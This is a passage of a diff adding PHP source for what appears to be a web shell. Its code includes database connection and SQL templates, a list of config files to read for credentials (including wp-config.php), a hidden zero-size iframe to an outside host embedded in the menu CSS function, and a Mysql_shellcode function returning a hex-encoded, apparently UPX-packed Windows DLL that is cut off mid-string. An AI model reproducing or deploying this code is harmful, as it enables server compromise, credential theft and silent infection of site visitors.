+	else{document.getElementById(\'editor\').submit();}
+}');
+}elseif($num == "3"){
+	html_n('function Full(i){
+   if(i==0 || i==5){
+     return false;
+   }
+  Str = new Array(12);  
+	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
+	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
+	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
+	Str[4] = "Provider=MSDAORA.1;Password=����;User ID=�ʺ�;Data Source=������;Persist Security Info=True;";
+	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
+	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
+	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
+	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
+	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
+	Str[11] = "DROP TABLE [TableName]";
+	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
+	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
+	if(i<=4){
+	  DbForm.string.value = Str[i];
+  }else{
+  	DbForm.sql.value = Str[i];
+  }
+  return true;
+  }');
+}
+elseif($num == "4"){
+	html_n('function Fulll(i){
+   if(i==0){
+     return false;
+   }
+  Str = new Array(8);  
+	Str[1] = "config.inc.php";
+	Str[2] = "config.inc.php";
+	Str[3] = "config_base.php";
+	Str[4] = "config.inc.php";
+	Str[5] = "config.php";
+	Str[6] = "wp-config.php";
+	Str[7] = "config.php";
+	Str[8] = "mysql.php";
+	sform.code.value = Str[i];
+  return true;
+  }');
+}
+html_n('</script>');
+}
+
+function css_left(){
+	html_n('<style type="text/css">
+	.menu{width:152px;margin-left:auto;margin-right:auto;}
+	.menu dl{margin-top:2px;}
+	.menu dl dt{top left repeat-x;}
+	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
+	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
+	.menu dl dt a:hover{color:#FFFFCC;}
+	.menu dl dd ul{list-style:none;}
+	.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
+	background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
+	border-style:solid;border-width:1px;}
+	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
+	</STYLE>');
+	html_n('<script language="javascript">
+	function getObject(objectId){
+	 if(document.getElementById && document.getElementById(objectId)) {
+	 return document.getElementById(objectId);
+	 }
+	 else if (document.all && document.all(objectId)) {
+	 return document.all(objectId);
+	 }
+	 else if (document.layers && document.layers[objectId]) {
+	 return document.layers[objectId];
+	 }
+	 else {
+	 return false;
+	 }
+	}
+	function showHide(objname){
+	  var obj = getObject(objname);
+	    if(obj.style.display == "none"){
+			obj.style.display = "block";
+		}else{
+			obj.style.display = "none";
+		}
+	}
+	</script><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe><div class="menu">');
+}
+
+function css_main(){
+	html_n('<style type="text/css">
+	*{padding:0px;margin:0px;}
+	body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
+	body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
+	height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
+	input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
+    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
+	.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
+	</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
+	<table width="85%" border=0 bgcolor="#555555" align="center">');
+}
+
+function css_foot(){
+	html_n('</td></tr></table>');
+}
+
+function Mysql_shellcode()
+{
+	return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C50144695D695685463BF80C13F6C1012E757FFDF4B46FFAED3F495F0B0C3BCF76038E8B4C13043B03BFF84D4BF4486783F920731CBF2CD3EFBFFB5FE88D4C01C4D7217CB044FE09752B752139EB2483C1EEC15CB0E01E2D21BCB0C4124AAEF174240679F04D42ADB519DB55890A040803630DDAD6FEBB088C8BFBC1FF044F83FF3F7B865F2F5167A8DBBDE197ECC4422BE20562AEA711A188F8495ADB5AF7E6A464760589F3CA411BFB40ED56E09F3E3BFA76028ABF746B2E9101DB4C69BE51BDBA16B9E491EAD22154111E96900F0BBDD221944C72B66DB152BF49BE4A0B04658BD6CA0811910EECB610F9D40939B68900B2F9295B73DD1B0B26892F0E05087FFB652B974A638A4C0704EF20884D0FFEC1FDEBE2BB880B7325807D0F55BB888BCFD3EBD81A25DB7609190DECB109B10BC436592924DC4FE019D821B8672559040F9D84B7F0DFC0F009388B54D0891A895C13FCFF086BAA0FB348FA4EB09CDFA6AFFFACEE0D0DA80EC1E10F03480CBB03B159E9581653513A1F32068B3D081C0950080E3940DDCDDE0D31A4886C570FFE48431C7BC39F0A481080794313836004FE118378D65AA61D106C5310785A124642882D0910C9F48D72F5388B15F21430C1C2B146DA282BC892110AD307BE708D48145170411C6D428DF767FA85B43B05223518BFEEEFD81496B88905ACEB0324A3AC8935B0493138532A6627F7AE142F68578D3C822C1B8E0ED3C6481776F0176A4934000B6FD57D0E56D3EE83EDFFEE0BE0B899EB1026BE33F6D3E80EC62D3E173049AC0F3BDF7FBF5D58E20873E14BE13B232B23FE0BCF75DDAE718B0B24143B9A1872E707756D26E4FB798BDA3BD8261505EBE6740BD7A019AC24C2837B3C3BD72A68891337EBED2681397B870D1B2FEEDBC8DC7646270B7B85DB90530E61DBE2F6BC595B1089FA43A8386C75EF6E6B071BE91406891DA5148B886F0BB016FAFEFC2D8B8C90C4B6B387FDAD904488378B127011557DA1A156DD1F000E440BD68B563077BF0B75178B91841CFF45FC04BF35EBA6FFFE23390BD774E98B97CA33FF5C5A741B87584D764C57CEE68DBA12C166EC645F9DBAED0AFD7C05D1E147EB752054F9430A2BE956EFEA7FF17BC1FE044EDE3F7EF83AC9DCB85E3BF79B0D0124617421206D207D2B11A27C383AEEFEB69CD3F3EC235C88448903FE0F75EA08B181F48E7B210BEB31172B5CBBC56895A1322119293673148215982C85220AA6D76593C07A04F80095AF3F4735D77A089084C5A97CF10348AD6D420CA522C264A974B32C06FE0B7D29C499C636576A0B331162BFB0CE6EBB64978C093B0A8F097CAEEB2FEF437AC0280D8D4EB6097B04B15C8F74B1BCAD16BEEE09376A2EB7F4AEF70B890A8903FCB2790DBFED56AE03D122011232FC9F8B34126FB70E218D790F3E751AA9B0A011A92BDC4B3BA406A49772C16B119C8D420408A1C41769A10220A489C09A6E6D44B6305F89507250D401E924E15797903B319841A10B889CC0930BF8653DB868C4411B45CBD81233305C81335C89834517F04610742A1B20655783363A63198CB014BDA5461C586460B47CB1856EAD4E24C5897E060562244A196A41B98BC36E74F1E051DF3771C84108343B5A2DDCC54FE043C331B63E6E3769C0815AFB3082C3026CB745EA40080204DE4A1E88D0AD5BFB85C1E7DF790C47A68686BDE88B3B08D13768ED4D2728B28D97101342773C47834BDB8D477748F283887EF4368379778D88FC06C740FCF0420EEFD0E77E01C24804C780E810140517EA0D7E3B48F09676C78B744F0CEDADFBC405F8FC015F2689AC8D4A0C087FB8BD6C8F41649E4442BC9EE38A46438A6F75D78DC80B84C07A884E43A30978047050608CBA2CCB687EA5266189BDC3ABA031BEAB17B614AB5ECCB80002BD063BC67D07EE07DA5BA319DB134451590D8DB535C5949808211256F4A0FA648B9018E21A33C9B874EBB7193D601519890476C020D46CEFC0D50884887CEA1CBA187C8A05A09A5BFE1134B5E055539F8B04865274C3F02F5E586F0A20C220418D82787CD1AD76BBA8A29BAC80448E8C458D3746DD05E97ADEE9B96A61A796EDDF72175F6877102B56F8C03B75466E436659C37CD780A065A52718F8141E1E722A5B76E9225120592139250384205934F449A884E2948073382CC6A1FE435607F644810401741D57A86F7264B348442A7448A3FCC6CF50E245D2C775C00ADB83F4E16C668AE85C39023A3E046A9095C4166A02CBDD6BC416264B1F593BC71C196610672B59CD696F29DA19821C24DFFF1D0A05DCDB4783A383E61FF3EF8A0635FAC7A40CF68064880400C60851AE70BF7F5F597D0FC1768182434EA883C3A8FC63B4B42A197808CA6681660CF7FB3360DBD2525E06900802042A635FC5A8648605C2F6FD1FE5EA460D409C6C48C5F7D8595E1B4B5F015E991B2E0C8957FBF609705C8080F9D53766A908E0B36F1368317B907E2657503BBFADE0401BD00E8B8074DC0DB4EB0E24FD07EB072483CBFF30351A9B81EF8B5FF6F5C154F85CC185B5ACF1279788D15A63F90E7A593917EDF118D97E74A1BBFFCDA30AA57A745FF6401D32AAC18561ECA218591A8517DFBB806DC11830AF01750F505222BC80D608851D37C597B58E4A50FF028B1A7536B654EC020BF841CEB04FF44A9DE370EC463B737C8CB1423914D98487B70160C37402FB5B36E42806FDA08A7477A50538839E890BA9639456E1A05FD68E48A06017858ED552908E4C6B80C4EAAF3109BB47752053951FDA5B57F7079E8D4614759F0658A54A340BA518EB56044261DBB65E097E123E0704C53F7CD5E1EE02115B5F5B5E95DD0001C3A150DC9BBA831B0B3F6116D080660DEE6118962668025B6C02664959538926F4317D0FAF7D10012334068B5B078BDF3C2E9A45D7CE0AA8AE74157E457AFB96A27C4014A78B7781E10868B1ABEDE67429191174229580AB1616697212F863F186A53FA9495C297E393EF62BDF017D321EBC6CD046147246CD63DA56A250177A4E74D391EDADDDBBD2F76B402BFAEB42FBE3F66B1935744701982BD83F1A608976723EB00729D10F234482252450E9D42E4AE0BE169FA44BA586D8080CF1A7264385F0385DD08157106F6A23B633A465C72B7483E7FE545B3CCF56C179148A0141CEF06CA387400E75F1B3ED814975AA01605E2CDD0623955CE88AFC2B32B9A7BA51C724A95E1306B6F57EA30719EBCD8D41FF559CC309824C32C9FEFDFCD126301C8687398FA4DF221A7A0BD2F86E8A073C61051BB4F4741A3C727C3CCC22BFD1D675FE0192EB20C99601EB08B909786157731209405A8A1D473AC31DB46DB6B5E33BD307DB60BEF652DB85C016547F3E601A2B74450475DBD6F21974360E61484CAC1F39FF2C98AD6108A328FC83C920EBB72F7D2063148E10EBA22240757D0BA54D6F0940EB982C7573E993E6006EA0B7FC0F0281CE0DEB82B8BA7D5C782AC8860BC834DB656274BE8BB60DCB2E070B42067540F6C5B6B7D8B7C73B80CD401E63F8752E5FF89315FE0A37E6FFBF9B16175DECD521CE84163A741DD9621B8DD20B418068A4D71362C3242210EA4C917EA9543C7DC4103BCB7D701A2C68DB12B73A896A89588018040859334A6C021C82005196FB871825A0590F8E9D7855AE209F1F3BC374377521509175ACB30D1BB16D14501D16E97FEBC4EBBA3CB1EB446A38C1E602C23268066B62600E56063A65306C327A7815DE4B1B96B3273CFB384F108C5F58DB56B604020CBF1F041C7EA1819D355975CC00D885F6E36DFF118DA424AB8D6406075AD5AA838AE5531FE0FEC7780B3708F7C2DB138A0A4238D974D18437EACF9683511275ED0BD857FBE310281E4BB5560893BFE5F8F18D6E5D33CB0365F983F1FFF0CF33BF3F4A3770C204EEF3751C250674D37F51D83AC508C1B475C45E357E0B5A808C8B42FC38D867A67BD33713EF38DC742717E7C1E81012157BD66E9ADC06D4EB962DB142FE377A38279D06FDFC0494C36B20EE5002FFD0371404E634449EEF32AC0E0400F3C3F32CC015505431F5DF64B1025F0E57299A11FC45438A3999947511064E18C1096C987394302FFE36C50C00E714892290881DC2F5115EDF753C8690D7C58C568D71E2EE112F52F07213AC9A83EE04883CDFC7349073ED5E972018AD20CF57A1102824851B7B7F8D5BC50BA35FC3816A9480BC60711B88116A0DEC08B25DB038E194D7730D70F6B55660C6FB6A192A6339BBB1C935A4F6C08490546A74E2A0D18E50ED8BF06B7875239F5A93565B8490A04018A50A8CFD37333859109C0462BF193868305333528CA116131E782F690E182FD118D1D80D41C3BB505244A06D10F00653BE5660368B9464F20D1CD94730B00D3F8A26684BC9911588EB227536D99B1059ACF545305BC392D09113D0022FDB610D506E746CF12499906D19450D283009999009384098EC9D9044503DEE10560B0EECA4FC00CA5E4F16D4E81A48506896046AD2546CF4691B8DA62874879FD9942100DE784F9B862947731E8085F74FECDD0EFF8BC646050AA127E253F4A8DF24051FEBDE784B518CBAC46620EA001F5B9B86281ABBC6388DD98DDD02AE1A81EA7D0851F8BAB787897C79E3677D56BE4C84983D04CB930D83839A1F6B556AC082C1731C806008F6D6A55960408B0E882481C1806DF5CC31E06D4D7CB76E8B130D1588092ACE4C3B04BCB1508BAAF926388A03BE126DB4BE32527572AABC04ACA41A4123404AFD37E0487D8B0989088A0B88488F05BE558B0AFC3BF77CB485016FF04E5B23333C81FFFDAD50BA3C754D290E2F75056AF658EB099B09BA92C348C397F50DC96E1BD0B84AFF7A175770340A9D800C5B0A25C1068D1B9906804BA40FEFB6700D540A0A700405804383FB6130F2E1037C97B89480B40638B491DEBE7B5E375778A8F0056E4673218D70837BFC00FB7DC26DAC0B7C2083C79683C324C8D00CBA2072E2854824720F338825B85473C487A01D94885B155434811237F8D58DCC6B8A069ED218A996783C3D74A756FA8DC26D4B140AC3E8F9BD581D3F9EF1C63B3BF3318E74410955BF1D267B41381F74395583D8ED8F348BE85945803F49225534521DBBCC54C02E579D4F6C67C4BEFD9A5903FD3775C95DFF84C28934C768BF1D0B891EAE9484015BA2BBB25983BDBE8A98994FC1A75456530DC0A15A84E38FA2848BFE3818747463A5FA7DA307FC5053539F37B4040B0CDB05C90488D486186DD8A46BD6A1082F2700C34A7424864635A6A08D355F485A6C9C9232B1458A68B14C18D147EFF317208321008B7510C700B50156B0802BEF4937A05BFFDFA0AE80382275448A50014080FA22FE84AE1B2FFFD274250FB6D2F68292610425FF012B3B3256FA068A108816F60BD5EBCE0C6E6FA11124CB46401CEB43F2B645C61E05044044DAF683D6DCFD5B1918881E4665207409090870ACF5F20975CC750348C34A66FF9A5AA946B5674EB5E003F0BE66442B052787A281993117C8BC15CE169739FF02FB0885FA5AD0B8225C75C8DA922C7FE1C6AD02752541397D6D0D80780